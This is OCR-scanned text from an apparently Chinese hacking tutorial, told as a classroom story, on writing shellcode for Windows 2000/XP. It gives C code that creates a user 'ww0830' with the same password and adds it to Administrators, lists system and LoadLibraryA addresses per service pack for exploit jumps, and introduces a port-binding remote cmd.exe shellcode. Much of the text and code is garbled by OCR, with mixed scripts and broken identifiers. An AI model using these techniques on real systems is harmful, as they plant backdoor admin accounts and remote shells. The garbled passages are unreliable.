上 午 一 大 早 我 束 去 了 教 宇 ， 看 了 一 会 儿 书 ， 同 学 们 才 陆 续 到 来 。 上 课 铃 响 后 ， 老 病 走 进 了 教 
室 ， 问 大 家 查找 LoadLibrary 和 system 辑 数 地 址 的 问题 解决 得 怎么 样 。 大 家 都 把 system 函 数 的 
地 址 找到 了 ， 并 一 一 报 了 出 来 。 而 LoadLibrary 的 地 址 其 他 人 都 说 没有 找到 ， 老 病 最 后 问 到 了 
我 ， 我 说 内 存 中 没有 LoadLibrary 的 函数 ， 只 有 LoadLibraryA 和 LoadLibraryW 函 数 ， 我 找 了 
LoadLibraryA 的 地 址 。 老 病 高 兴 的 说 :“ 束 是 这 样 的 。” 并 解释 道 :“ 在 Win2000 下 ， 系 统 只 有 
LoadLibraryW 的 实现 ，LoadLibraryA 只 有 一 个 亮 。 如 果 调 用 LoadLibraryA， 其 实 也 是 系统 自 
ZjjASCIIS 2A A 7; Unicode, #39 Ні оааціргагум 4%, ” 


老病 还 把 ASCIH 和 Unicode 的 差别 讲 了 一 下 。 
小 知识 : ASCII 和 Unicode 


ASCII 编 码 是 用 一 个 字 节 来 表示 字符 ， 这 样 只 有 256 种 组 合 ， 能 表达 的 字符 有 限 。 而 Unicode 
是 用 两 个 字 节 (16 位 ) 来 表示 字符 ， 这 样 共 有 65536 种 组 合 ， 可 以 表达 完 世 界 上 的 所 有 文字 。 
为 了 世界 化 推广 产品 、 减 少 成 本 以 及 提高 效率 ， 现 在 人 们 都 更 多 的 使 用 Unicode 编 码 。 


Unicode 只 是 一 个 字形 和 内 码 上 的 标准 ， 并 没有 定义 实际 在 电脑 中 存 取 的 方法 。 因 此 ， 
Unicode 协 会 便 定 义 了 一 整套 存 取 Unicode 编 码 的 转换 格式 ， 称 之 为 UTF， 章 用 的 格式 有 UTF- 
8 和 UTF-16。 





接 下 来 是 讨论 时 间 ， 老 病 找 一 位 同学 上 去 讲 昨天 的 作业 一 一 添加 用 户 的 ShellCode 的 编 守 。 当 
时 老 症 环顾 了 一 下 大 家 ， 并 问 有 没有 同学 自愿 。 我 心里 很 矛盾 ， 既 想 上 去 让 大 家 看 看 我 的 成 
果 ， 又 怕 讲 得 不 好 。 最 后 在 老 症 的 再 三 激励 以 及 小 倩 MM 期 待 的 目光 下 ， 我 勇敢 的 站 了 起 来 ， 
并 在 大 家 的 掌声 中 走 上 了 讲台 。 


在 台 上 ， 我 把 昨天 在 家 中 的 分 析 和 实现 过 程 详细 的 说 了 一 志 ， 并 把 提取 出 来 的 ShellCode 拿 给 
老病 和 同学 们 看 ， 结 果 得 到 了 老病 和 同学 们 的 一 致 肯定 和 表扬 。 


融 是 在 台 上 的 时 候 太 紧张 了 ， 下 台 坐 好 后 ， 才 发 现 目 己 一 身 的 汗水 ， 腿 也 在 不 断 打 颜 ， 征 好 
大 家 都 看 不 到 ， 特 别 是 小 倩 ， 不 然 多 没 面子 啊 ! 相信 有 了 这 次 经 验 ， 下 次 要 好 得 多 ， 斋 望 以 
后 能 有 更 多 类 似 的 锻炼 机 会 。 


最 后 老病 还 给 出 了 一 种 新 的 添加 用 户 的 有 版本， 其 C 代 码 如 下 : 


#ifndef UNICODE 

#define UNICODE 

#endif 

#include <stdio.h> 

#include <windows.h> 

#include <lm.h> 

#pragma comment(lib, netapi32") 
int wmain() 


USER INFO 1 ui; 

DWORD dwError = 0; 

ui.usrid name = L"ww0830"; 
ui.usrid password = L"ww0830"; 
ui.usril_priv = USER_PRIV_USER; 
ui.usril_home_dir = NULL; 
ui.usril_comment = NULL; 
ui.usril_flags = ОЕ SCRIPT; 
ui.usril_script_path = NULL; 

// 添 加 名 为 ww9830 的 用 户 ， 密 码 也 为 ww08390 
if(NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError) == NERR Success) 


l 
/7 添加 成 功 
printf("Add user success.Nn"); 
) 
else 
l N 
/7 添加 失败 
printf("Add user Еггог!\п"); 
return 1; 


wchar t szAccountName[100]-10); 
wcscpy(szAccountName, L'"ww0830" ) ; 
LOCALGROUP MEMBERS INFO 3 account; 
account.lgrmi3 domainandname-szAccountName; 
// 把 ww0830 添 加 到 Administrators 组 
if(NetLocalGroupAddMembers (NULL, L'Administrators",3, (LPBYTE)&account,1)== NERR Suc 


l 
// 添 加 成 功 
printf("Add to Administrators success.\n"); 
return 0; 

} 

else 

1 N 
// 添 加 失败 
printf("Add to Administrators Fail!\n"); 
return 1; 

} 





这 种 方法 用 的 是 Netapi32.dll 里 的 NetUserAdd 和 NetLocalGroupAddMembers 函 数 。 好 酷 啊 | 
执行 效果 如 图 2 一 24。 当 时 我 就 下 定 决 心 : 自己 会 复 厅 ShellCode 的 编 守 后， 一 定 要 把 它 改 为 
机 器 码 的 ShellCode。 
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Add user success. 


Hinclude Xstüdlo.h- 

Hinclude £windnus.h»? 

Winciude &Lm.hn» 

pragma comment(1liE,'"netapi32") 


int umaing) 


USER IHFD 1 ui; 
DWORD dwError = B; 


ul.usril папе = ["wud837'; 
ui.usril password = L'"wuB83H"; 
UL .usr priu = USER PRIU USER : 
ui.usrit home dir = HILL; 
ui.uzrií conmert = HULL; 
ui.usril Flags = ШЕ SCRIPT; 





1 
HORS 
printf("hdd user success.kn"); 


elce 





1 
ё rS I Sr z 
4 F 
z|- ii a= -Configuration: NetlserAdic = Min32 Debug-------------------- E 
= Compiling- - - 
He cUserAddC -cpp 
Linking... - 
tra ran henmanoimbn La La JJ JJ — 
| [кпш 2 Xu F.ud in Files - [| *| ‚| 
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不 过 我 又 想到 ， 那 些 实际 的 ShellCode 是 怎样 的 呢 ? 如果 只 是 添加 个 用 户 ， 用 处 不 是 很 大 ， 于 
是 我 提出 了 目 己 的 疑问 。 


老病 又 表扬 了 我 ， 说 考虑 得 很 全 ， 并 说 下 节 课 继续 复杂 的 ShellCode 的 研究 ， 写 一 个 真正 的 
ShellCode, 


看 到 小 倩 又 看 了 我 一 眼 ， 心 里 为 之 一 动 。 她 这 一 再 ， 有 什么 意思 呢 ? 她 也 知道 我 的 一 片 心 情 
оп 2 


c 
ШЕ 
~ 
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ж 0200,08,  RXRIEBAAAMLILBUE f. 


Me ЕЖЕ, RARE- 00 RAE ЗАЙ), КАБА ЛАА f. 作业 完成 
得 很 好 ， 也 可 以 好 好 的 休息 一 下 了 ， 今 天 真是 尾 意 啊 ! 


Ж 6 А = 


Q : 我 在 Windows 2000 SP2 版 本 下 ， 坦 找到 LoadLibraryA 酌 数 的 地 址 是 0x77E6A254， 
system 本 数 的 地 址 是 0x78019B4A， 都 是 正确 的 ， 但 为 什么 我 把 ShellCode 对 应 的 地 方 改 
成 \x77\xXE6\xA2\x54”" 和 “\x78\x01\x9B\x4A” 后 ， 不 能 弹出 DOS 窗 口 呢 ? 


A : 你 把 字 节 的 顺序 写 反 了 ， 应 该 是 ^\x54\xA2\xE6\x77”" 和 “\x4A\x9B\x01\x78”。 
О: 哦 1 改动 后 的 硼 能 正确 弹出 DOS 对 话 框 了， 但 为 什么 顺序 要 是 这 样 呢 ? 好 别扭 啊 ! 


A : 在 Windows 系 统 下 ， 多 字 节 数 存放 的 规则 是 : 数 的 高 位 放 在 内 存 高 址 ， 数 的 低位 放 在 内 存 
低 址 。 对 0x77E6A25478 来 说 ，0x77 是 最 高 位 ， 所 以 要 放 在 内 存 的 高 地 址 ， 而 在 字符 串 中 ， 
是 按照 内 存 从 低 到 高 排列 的 ， 所 以 要 把 0x77 放 在 字符 串 中 数 的 最 后 。 在 后 面 的 章节 中 还 会 讲 


到 。 
Q : BET BEZA LH — EE 0 Кі оаашргагуд в 2 f [system P Z& B^] 3th HE 4& fg, ? 


A : 好 的 。LoadLibraryA 和 system 画 数 的 地 址 在 Win2000 SPOF, 4 5] 20х77Е78023#1 
0x7801AAAD ; 在 SP2 下 分 别 是 0x77E6A254 和 0x78019B4A ; 在 SP3 下 分 别 是 0x77E69F64 和 
0x7801AFC3 ; 在 XP SPO 下 分 别 是 0x77E605D8 和 0x77BF8044。 


注意 的 是 ， 覆 盖 的 跳 转 地 址 也 要 符合 相应 版 本 ， 最 好 使 用 通用 地 址 。 


要 
О: 为 什么 LoadLibrary 函 数 在 系统 里 面 有 LoadLibraryA 和 LoadLibraryW 两 种 实现 ?而 system 
只 有 一 个 实现 ， 没 有 systemA 或 systemW 呢 ? 


A: 问 得 好 1 这 是 因为 在 Windows 下 ， 存 在 几 种 编程 接口 。 


一 种 是 Windows API 函 数 。 这 类 画 数 是 和 Windows 系 统 相 关 的 ， 使 用 的 也 是 Windows 下 才 特 
有 的 数据 类 型 (比如 CHAR) „ APIKA FARW 9 $83:30, müLoadLibraryzéAPIBS 
数 。 
另 一 种 是 C 运 行 链接 库 ， 是 按照 C 语 说 的 标准 来 实现 的 ， 所 以 只 有 小 写字 母 ， 而 且 只 有 一 种 实 
现 ， 上 比如 system 男 数 。 

: 那 怎么 区 分 API 函 数 和 C 运 行 库 玉 数 呢 2 


A: 从 函数 的 命名 可 以 看 出 来 。API 函 数 遵循 的 是 Windows 自 己 定义 的 命名 规范 ， 是 大 ?洪水 
| |? 小 写 混 写 的 函数 ， 如 LoadLibrary ; 而 在 C 语 言 标准 中 ， 规 定 画 数 名 称 都 是 小 写 ， 所 以 C 运 
行 库 男 数 也 遵循 全 是 小 写 的 规范 ， 如 System。 


Q : x tZ Windows 8 A M d xis ? 


А: Нук 48.382468 — Po SR RESP ap А 50, PRAA E f АРІ аА ; 但 为 了 保持 和 标 
ECHES, Cis {7 У аА f СЕ а ENRE ; 所 以 存在 了 两 种 命名 规范 。 


О: 那 我 们 目 己 编程 时 用 那 种 命名 规则 呢 2 


A : 哈哈 1 命名 规则 应 和 所 用 的 操作 系统 或 开发 工具 的 风格 保持 一 致 。 例 如 ，Windows 应 用 程 
序 的 标识 符 通常 用 “大 小 写 ? 混 排 的 方式 ， 如 AddChild ; 而 Unix 应 用 程序 的 标识 符 用 “小 写 加 下 
划 线 ”的 方式 ， 如 add child。 别 把 这 两 类 风格 混在 一 起 用 。 


我 们 目 己 开发 时 ， 在 Windows 下 建议 使 用 "匈牙利 "命名 规则 ， 类 名 和 国 数 名 用 大 写字 母 开头 的 
单词 组 合 而 成 ， 变量 和 参数 用 小 写字 母 开 头 的 单词 组 合 而 成 ， 背 量 全 用 大 写 ， 全 局 变量 加 前 
级 “g”， 类 的 数据 成 员 加 前 级 “m _”。 


О: 我 们 如 何 验 证 提取 出 的 ShellCode 是 否 正 确 呢 ? KRAT. 


A: 有 两 种 方法 。 一 种 方法 是 在 实际 渝 出 程序 中 ， 使 用 提取 出 的 ShellCode 测 试 ， 看 能 否 达 到 
效果 ; 另 一 种 方法 就 是 把 ShellCode 数 组 当成 一 个 函数 来 执行 ， 其 实现 办 法 会 在 下 一 章 的 “ 验 
证 ShellCode 功 能 方法 "中 讲 到 。 


О: 好 像 ShellCode 里 面 不 能 有 0x00， 为 什么 呢 ? 怎么 避免 呢 ? 


A : 因为 0x00 是 字符 串 的 结束 符 ， 如 果 ShellCode 中 存在 ， 就 会 被 截断 ; 我 们 会 在 ShellCode 
变形 大 法 一 章 中 详细 的 讲解 如 何 避 免 0x00 的 方法 。 


第 三 章 、 后 门 的 编写 和 Shellcode 的 提取 


新 的 一 周 开始 了 ， 又 到 了 上 课时 间 。 

“ 唉 ， 足 球 又 输 了 。 ”老病 一 进 教 室 就 说 。 

“什么 比赛 ， 打 谁 啊 ? 几 比 几 ? "女生 们 不 解 的 问 道 。 

“世界 杯 小 组 预选 赛 ， 客 场 打 科 威 特 0 比 1 输 了 ”。 老 病 把 包 往 党 子 上 一 扔 ， 懒 懒 的 说 。 
哎哟， 科威特 都 打 不 过 啊 .…… 还 记得 亚洲 杯 3 比 1 输 给 了 日 本 队 呢 ! 


“是 啊 ， 这 下 小 组 能 否 出 线 还 是 个 问题 ! 我 从 94 年 甲 A 开 始 就 开始 看 球 了 ， 结 果 越 看 越 没 意 
思 。” 老 病 边 准备 上 课 边 说 ,“ 到 现在 ， 任 何 国内 比赛 都 不 看 了 ， 最 多 看 看 国家 队 的 比赛 。” 


“国内 的 球 队 ， 还 是 要 文 持 吧 ? "一 个 女生 说 遗 。 


“ 别 担 了， 当年 成 都 保卫 战 时 ， 凑 晨 融 要 排队 买 票 ; 虽然 成 绩 不 理想 ， 但 大 家 还 是 一 如 既往 的 
支持 。” 宇 强 也 说 道 ，“ 但 现在 ...... 主 要 是 一 些 东 西 太 让 人 失望 了 。” 


“是 啊 ， 和 希望 我 不 要 让 你 们 失望 啊 ! 呵呵 1” 老病 开玩笑 的 说 。 
ЖЕ, ME, FARR ! "大 家 说 , “但 老病 要 把 技术 全 瘟 托 出 哦 ” 
“了 呵呵 ， 我 全 盘 托 出 倒 没 问题 ， 大 家 可 要 加 油 学 习 啊 ! ”老病 说 道 。 
“当然 ， 我 们 也 不 会 让 老病 失望 的 。” 


“了 呵呵， 刚才 是 给 大 家 鼓 鼓 气 |! 今天 我 们 会 进入 真正 ShellCode 的 编写 1 ”老师 恢复 了 上 课 状 
太 ,，“ShellCode 是 完成 功能 的 代码 ， 现 实 中 的 ShellCode 有 很 多 种 ， 一 是 因为 我 们 想 要 的 功能 


很 多 ; 二 是 由 于 即使 完成 一 种 功能 ， 也 有 很 多 不 同 的 实现 ， 它 们 各 有 优 劣 ， 不 能 说 谁 好 谁 
йе” 


“R! 一 般 的 ShellCode 都 有 哪些 功能 呢 ? "у js] 38. 


“ShellCode 的 功能 很 多 ， 和 部 见 的 一 些 是 开 一 个 本 地 痛 口 、 反 连 攻 击 机 、 下 载 一 个 文件 并 执 
行 、 传 输 一 个 文件 并 执行 等 。” 


“ 哦 ， 这 么 多 啊 | » 


"Umm, жа 820 НУВ, Ша 1 т, ав іо. жеж, анаа 
Socket 来 使 用 等 。” 


^B] ^? "同学 们 都 听 得 一 惯 一 惯 的 。 
"不要紧 ， 我 们 一 步 步 的 来 学 习 。 记 住 我 们 的 守则 是 ..…...” 


ха Ж. "Е – Па, 


Eu a АЕА RS-—hs 


ЖО 82 i OK, VARFERISE : "我 们 要 记 住 的 是 一 一 营 握 学 习 方 法 ， 而 不 是 
ЖАЖА І” 


"Hx, op, cup] ! " 玉 波 乐 着 说 。 


3.1 预备 知识 


“好 ， 今 天 我 们 实现 一 个 开端 口 的 ShellCode， 一 个 真正 的 ShellCode。 此 ShellCode 的 功能 是 
在 对 方 机 器 上 用 某 个 疹 口 开 一 个 Telnet 服务 器 ， 然 后 等 待 远程 机 器 来 连接 。 当 远程 机 器 连接 
上 之 后 ， 为 其 开创 一 个 cmd.exe， 把 远程 机 器 的 输入 输出 和 cmd.exe 的 输入 输出 联系 起 来 。 这 
样 ， 远 程 使 用 者 融 有 了 一 个 远程 Shell。” 


“好 啊 ! "虽然 还 不 大 懂 ， 但 又 有 未 西学 了 ， 大 家 都 很 高 兴 。 


“这 里 比 以 前 要 麻烦 些 ， 有 网 络 编程 、 进 程 通 信 、 管 道 等 各 方面 ， 我 们 一 个 个 的 来 解决 。 大 家 
可 要 有 耐心 啊 1” 


"I 


3.1.1 IP 和 Socket 编 程 初步 


“我 们 的 ShellCode 的 功能 是 完成 网 络 的 远程 连接 ， 那 自然 会 涉及 到 网 络 通 信 。 网 络 通信 有 好 
几 种 实现 方法 ， 这 里 我 们 使 用 Windows Socket 编 程 。” 


小 知识 : Windows 下 网 络 通信 编程 的 几 种 方式 


一 种 是 基于 NetBIOS 的 网 络 编程 ， 这 种 方法 在 小 型 局 域 网 环境 下 的 实时 通信 有 很 高 的 效 
>É ; 


第 二 种 是 基于 Winsock 的 网 络 编程 ; 这 种 方法 使 用 一 套 简 单 的 Windows APIB432 3 9: zi у НЕЗ E 
上 的 编程 ; 


第 三 种 是 直接 网 络 编程 ; 比如 Winpcap、libnet 等 网 络 数据 包 构 造 技术 可 以 完成 链 路 层 或 网 络 
层 上 的 网 络 编程 ; 


第 四 种 是 基于 物理 设 各 的 网 络 编 程 ， 即 MAC 层 编程 接口 。 
“Socket 是 什么 ?有 什么 用 处 呢 ? " 玉 波 问 道 。 


“和 1IP 作 类 比 吧 。 在 国际 互联 网 Internet 上 ， 有 成 千 百 万 台 主 机 ， 为 了 区 分 这 些 主机 ， 人 们 给 每 
台 机 器 都 分 配 了 一 个 专门 的 ' 地 址 ' 作 为 标识 ， 这 融 是 IP 地 址 。1IP 地 址 融 像 是 计算 机 在 网 上 的 映 
份 证 ， 通 过 它 才 能 确定 网 上 不 同 的 机 器 ， 大 家 才能 互相 通信 。” 


小 知识 : 


Internet IP 地 址 由 Inter NIC (Internet 网 络 信息 中 心 ) 统一 负责 全 球 地 址 的 规划 、 人 管理 。 
常 ， 每 个 国家 需 成 立 一 个 组 织 统一 站 然后 再 分 配给 客户 。 


IP 地 址 分 为 A、B、C、D 和 E 类 。|P 地 址 通常 以 圆 点 为 分 隔 号 的 4 个 十 进 制 数字 表示 ， 每 个 数字 
对 应 于 8 个 二 进 制 的 比特 串 ， 如 某 一 台 主 机 的 IP 地 址 表示 格式 为 : 128.20.4.1 。 


“我 们 要 看 自己 机 器 上 的 IP 很 方便 。" 老 证 接 着 说 , “一 种 方法 是 在 ' 网 上 邻居 :上 点 击 鼠 标 右键 ， 
在 弹出 菜单 中 选择 ' 属 性 ' ; 然后 在 ' 本 地 连接 ' 图 标 上 点 击 右 键 ， 选 择 ' 属 性 ， 选 中 ‘Internet 协 议 
(TCP/IP) 并 双击 ; 就 可 看 到 图 3 一 1 所 示 的 窗口 。 


O 自动 获得 IF 地 址 (0) 
(e) 使 用 下 面 的 ІР 地 址 (5): 
IP Hill: 


子 网 撞 码 (U) : 
转让 网 M): 








上 自动 获得 DNS ДЕ 5-58 (В) 


@ 使 用 下 面 的 DNS 服务 器 地 址 (Е). 


备用 DNS 服务 器 (А): 








“可 以 看 到 ， 这 


2. 7 


IP RE- 
is. 


| 211 ‚ 83 .154 120. 


759 .299 .294 . 0 


211 . 85 .155 .254 


首选 DNS 1655-98 (р): 202 .115 . 32 . 36 





台 机 器 的 IP 是 211.83.154.20， 但 如 果 是 通过 DHCP 服 务 器 自动 获得 
这 种 方法 束 不 行 了 。” 老 病 换 了 一 台 机 器 进行 演示 ， 


否则 ， 








获得 IP 地 址 ， 那 


“看 ， 不 会 在 这 里 显示 出 IP 地 址 ， 如 图 3 一 


Internet ВУ (TCP/IP) ET 


TOÀ ”| 备用 配置 


dE EET IP $E. di, 
当 的 ІР GRE 


© 自动 获得 ІР 地 址 (D) 
O 使 用 下 面 的 IP 地 址 (S) 





С) m TER: DES < 服务 器 地 址 (E) 





“这 个 时 候 ， 我 们 融 要 用 另 一 种 方法 了 。 шыш an ， 输 入 cmd 并 确定 ， 在 命令 行 下 输 
Л ipconfig 20 2] #]1Р, 183—3, 1ІР10.4.4.79, 


ci C:\FIRDOFS\Systemngj2\cad. exe 
2、 ipconf 19 


Jindous IP Configuration 


Ethernet adapter . T. HU EE te - 


Connect ion-specific DNS Suffix . : cdntc 

IP Rddress. 。 。 . - - = нна а 5 10.4.4. 77 
Subnet Mask . . 。 a a - . « < a š 255.255.255.8 
Default Gateway . . . =. = = == 。 š 1B.4.4.1 





小 知识 : IP 地 址 危机 和 NAT 转 换 


最 初 设 计 IP 协 议 时 ， 设 计 者 没有 料 到 网 络 会 如 此 的 高 速 发 展 ， 现 在 IP 地 址 正 迅速 的 枯竭 ， 如 果 
没有 IP 地 址 ， 主机 或 者 移动 通信 设备 在 网 络 上 就 没有 唯一 的 身份 识别 ， 也 就 不 能 发 送 或 接收 
数据 了 。 


有 两 种 解决 办 法 。 一 是 使 用 新 一 代 的 IP 协 议 一 一 IPv6，IPv6 采 用 128 位 数字 ， 所 以 地 址 的 范围 
可 以 看 作 是 无 限 的 ; 另 一 种 是 使 用 NAT (Network Address Translation) 一 一 网 络 地 址 转换 ， 
允许 内 部 网 络 上 的 多 台 РС (使 用 内 部 地 址 段 ， 如 10.0.x.x、192.168.x.x、172.x.x.x) 共享 单 
个 、 全 局 路 由 的 IPv4 地 址 ， 这 在 一 定 程度 上 缓解 了 IP 地 址 不 足 的 问题 。 





“这 下 大 家 对 IP 地 址 没什么 问题 了 吧 。" 老 炳 问 道 。 


“E `=E ЖЖ 了 


心 /月 ° 


AE 
“好 ， 然 后 我 们 来 看 看 Socket 吧 ! 虽然 IP 可 以 唯一 的 区 分 网 络 上 的 每 台 主 机 ， 但 每 台 主 机 可 能 
同时 和 多 台 机 器 通信 ， 有 可 能 某 个 软件 融和 多 人 台 机 器 通信 ， 比 如 大 家 弟 用 的 QQ、IE 浏 览 右 。” 


“所 以 公公 依靠 IP 地 址 是 无 法 区 分 一 台 机 器 的 所 有 通信 的 。*" 老 病 继 续 说 道 ，“ 为 了 解决 这 个 问 
B, MBIA T Socket (中 文 名 称 是 套 接 字 ) 。” 

“对 每 一 个 通信 ， 除 了 IP 地 址 外 ， 还 用 一 个 标识 符 Socket 来 标明 每 个 通信 程序 (进程 ) 。 示 意 
图 如 图 3 一 4。 Í 





Socket1 ^ Z Socket п 
4 


вч i 
一 
prsocketNum | P | 





“ 打 个 比方 ， 我 有 一 把 钥匙 ， 可 以 打开 某 个 房间 里 的 一 把 锁 ， 但 仅仅 知道 房间 号 还 不 够 ， 还 需 
要 知道 是 具体 那 把 锁 。” 

“如 果 把 多 个 房间 看 成 是 多 台 计 算 机 ， 那 房间 号 就 相当 于 IP 地 址 ， 钥 是 是 数据 ， 锁 束 是 程序 。 
数据 和 程序 要 通信 ， 融 像 钥 是 要 找到 所 属 的 锁 ， 仅 赁 所 在 的 房间 号 是 不 够 的 。” 

老病 喝 了 一 口水 ， 继 续 说 道 : “所 以 我 们 可 以 在 钥匙 上 贴 一 个 标签 ， 注 明 是 哪个 房间 、 哪 把 锁 
的 钥匙 。 融 像 通 信 中 的 Socket， 作 为 计算 机 通信 的 标记 ， 标 明 通 信 是 哪 台 机 器 的 哪个 程序 
的 。 这 样 束 可 准确 分 别 出 通 信和 双方 了 。” 


“ 哦 ， 这 样 啊 1" —– FRA 7. 


“ 套 接 宇 Socket 在 网 络 通信 中 非常 重要 ， 当 年 可 是 加 利 往 尼 亚 大 学 伯克利 分 校 (Berkeley) Ж 
费 了 大 量 精 力 才 设计 出 来 的 ， 所 以 也 称 为 Berkeley 套 接 字 。” 


“ 哦 ， 那 以 后 我 也 设计 个 吃 的 东西 ， 拿 我 的 名 字 命 名 。” 玉 波 满怀 信心 的 说 。 

“不 用 设计 什么 了 。 他 高 做， 但 宏 心 人 厚 ; fbutk, {Н5е Л ДЕАШ | ежа ХА, 
地 狱 的 亚太 一 一 食 伸 玉 波 ! ” 

“哈哈 哈哈 ......” 大 家 狂笑 了 起 来 。 

“好 了 ，” 老 病 说 道 ，“ 我 相信 在 座 的 各 位 在 不 久之 后 一 定 会 有 所 建树 的 ， 出 名 之 后 ， 可 不 要 态 
了 我 啊 1” 

“哈哈 哈哈 ......" 大 家 又 大 笑 了 起 来 ， 眼 泪 都 快 出 来 了 。 


“OK | 玩笑 开 够 了 ， 我 们 继续 ，” 课 涓 积 微 安静 后 老病 说 道 ,，“ 通 过 伯克利 的 成 果 ， 我 们 使 用 
Socket 实 现 网 络 通信 编程 就 非常 方便 了 。Socket 其 实 就 是 一 个 整数 ， 它 标识 了 计算 机 上 不 同 
的 通信 问 点 。 程 序 在 通信 前 首先 建立 一 个 套 接 字 ， 以 后 对 设置 |P、 辣 口 和 传输 数据 ， 都 通过 


此 套 接 字 来 进行 。” 

小 知识 : 端口 port 

是 指 TCP/IP 协 议 中 规定 的 病 口 ， 泄 围 从 0 到 65535。 —— 比如 网 页 服务 大 一 
№2800 0, ЕТРВК 5-25 — 522110 ; 在 客户 痕 连 接 中 ， 也 需要 一 个 病 口 来 通信 ， 一 般 是 
EE d S BI Ab m D S. 

“大 家 理解 了 套 接 字 Socket 的 概念 ， 是 不 是 想 实际 使 用 一 下 呢 ? ”老病 问 道 。 

“是 啊 | 想 看 看 到 底 是 怎样 编程 的 。 

“Hf ! 使 用 Socket 在 两 癌 计 算 机 上 实现 通信 ， 其 实 是 件 简单 的 事 。 首 先 我 们 看 通信 的 流程 。” 


“通信 双方 一 定 有 一 台 是 服务 端 ， 一 台 是 客户 端 。 服 务 端 首先 启动 ， 建 立 一 个 套 接 字 Socket， 
并 对 相应 的 IP 和 疹 口 进行 缚 定 、 监 听 ; 客户 问 也 建立 一 个 套 援 字 ， 和 服务 病 不 同 ， 它 下 接连 
搂 服 务 痛 监听 的 闯 口 。 双 方 建立 连接 后 ， 服 务 痕 和 客户 痛 融 可 以 互相 传输 数据 了 ， 当 然 都 是 
通过 Socket 来 完成 的 。 


其 工作 流程 图 如 3 一 5。 


客户 机 


bind()]% sockets 于 本 地 地 址 相连 


listenOiÉ Ж] ТСР, — socket), ELAMAS. AE] sockets 





x accepi), 1105, $92 4 52 


ь. | 


connect). 183952 Ел E DES 


АЕ, = ЕРЕ 





send(/recvO. ТЕ Чё DE. EHE 
服务 请 求 ,响应 


closesocket(), KAEST 结束 ТСР ЯА 







recy(/sendO, TE S2 上 读 、 与 数据 










closesocketO. XP {9/52 
closesocket(O. ЖИЙЕН ЕЕ 


“ХТ ВОЯ 5, xix ETHZDBER- F. ” 


int WSAStartup(WORD wVersionRequested, LPWSADATA  lpWSAData); 


功能 是 初始 化 Windows Socket Dll， 在 Windows 下 必须 使 用 它 。 
参数 : 
“WVersionRequested" 表 示 版 本 ， 可 以 是 1.1、2.2 等 ; 


“lIpWSAData” 指 向 WSADATA 数 据 结 构 的 指针 。 


int socket(int family, int type, int protocol); 


功能 是 建立 Socket， 返 回 以 后 会 用 到 的 Socket 值 。 如 果 错 误 ， 返 回 一 1。 
参数 : 


"int family” 参 数 指定 所 要 使 用 的 通信 协议 ， 取 以 下 几 个 值 : АҒ UNIX (Unix 内 部 协议 )、 
AF INET (InternetZ x) 、AF_NS Xerox (NS 协议 ) 、AF_IMPLINK (IMP 连 接 层 ) ， 在 
Windows 下 只 能 把 “AF" 设 为 “AF_INET”; 


“int type" 参 效 指 定 套 接 字 的 类 型 ， 取 以 下 几 个 值 : SOCK STREAM (WARF) 


SOCK DGRAM (数据 报 套 接 字 ) 、SOCK RAW (未 加 工 套 接 字 ) 、 
SOCK SEQPACKET (顺序 包 套 接 字 ) 


"int protocol" 228 S i 1 77 Oe 


int bind(int sockfd, struct sockaddr *my addr, int addrlen); 


功能 是 把 套 接 字 和 机 器 上 一 定 的 端口 关联 起 来 。 
参数 : 
“sockfd” 是 调用 socket() 返 回 的 套 接 字 值 ; 


“my_addr 是 指向 数据 结构 struct sockaddr 的 指针 ， 它 保存 你 的 地 址 ， 即 病 口 和 IP 地 址 信息 ; 


"addrlen";& i& 7j sizeof(struct sockaddr). 


int listen(int sockfd, int backlog); 


JJ BE ze BR 2 Wa W Dr — Wi L1, 


参数 : 


和 到 accept()。 在 发 生 错 误 时 返回 -1。 


“sockfd” 是 调用 socket() 返 回 的 套 接 字 值 ; 


“backlog” 是 允许 的 连接 数目 。 大 多 数 系 统 的 允许 数目 是 20， 也 可 以 设置 为 5 到 10。 


int connect(int sockfd, struct sockaddr *serv_addr, int addrlen); 


JJ BE xe 28. Р ini F BR 2- W W ПЛ Jm H o 


“sockfd” 是 调用 socket() 返 回 的 套 接 字 值 ; 
“serv_addr 保 存 着 目的 地 端口 和 IP 地 址 的 数据 结构 struct sockaddr ; 


"addrlen";& ië 7j sizeof(struct sockaddr). 


int accept(int sockfd, void *addr, int *addrlen); 


7J] BE xe BR 2 imde Se Es у” НЕЕ Pea Ж, JEXxE[BI—Ó T ARES ERE, DAHER Wa Bu 28 ia miss 
Fx ARBUEdSEES. HIA x, 151-1. 


参数 : 


“sockfd" 是 和 listen() 中 一 样 的 套 接 字 值 ; 
“addr" 是 个 指向 局 部 的 数据 结构 sockaddr_ in 的 指针 ; 


"addrlen";& i& 7j sizeof(struct ѕоскаааг in), 


int send(int sockfd, const void *msg, int len, int flags); 
int recv(int sockfd, void "buf, int len, unsigned int flags); 


功能 是 用 于 流 式 套 接 字 或 数据 报 套 接 字 的 通讯 ， 我 们 数据 的 真正 传输 就 由 它们 完成 。 
参数 : 

“sockfd" 是 发 / 收 数据 的 套 接 字 值 ; 

“msg” 指 向 你 想 发 送 的 数据 的 指针 ; 

“buf' 是 指向 接收 数据 存放 的 地 址 ; 

"len ze Sua P) KE. ; 

“flags”; i& 7j 0, 


int sendto(int sockfd, const void *msg, int len, unsigned int flags,const struct sockaddr 
int recvfrom(int sockfd, void *buf, int len, unsigned int flags, struct sockaddr *from, 


a] — | 


功能 和 send、recv 类 似 ， 不 过 是 用 于 无 连接 数据 报 套 接 字 的 传输 。 





int closesocket (int sockfd) 


功能 是 关闭 套 接 字 。 
参数 “sockfd" 为 要 关闭 的 套 接 字 值 。 
"E ! 好 复杂 的 图 数 ， 好 难 记 啊 ! KARRE, 


“NO， 虽 然 田 数 有 后 多 ， 每 个 落 数 又 有 很 多 人 参数， 但 大 家 完全 没有 必要 去 死记 (其 实 也 是 记 不 
清 的 ) 。 大 家 要 记 的 是 流程 和 思路 ， 编 程 要 用 具体 琅 数 时 ， 查 MSDN 吧 ! 非常 详 细 的 开发 帮 
助 资 料 ， 会 找到 你 要 用 的 。 如 图 3 一 6。” 


* ESDH Library 一 Visual Studio . НЕТ Zü) 一 =&0гКЕРТ 
тї шї ШШ ТА 920) #8500 
[€ + @ Ci ф@ Go E | mss-help'//WS. MSDHQTE 2DC3FEB.2)52/wiasorck! е =] Фф + ЛЖ X Es m. 





索 3| n x socket | 4q4 > x 





Тре socket function creates a socket that is bound to a specific service provider =! 


socket archive buffer | SÜUCEET mocket( 
Жем handle int 5f. 
üperater | 
sockrt options int Сүзе, 本 
readirg int protocol 
sockst options not sapported y: 
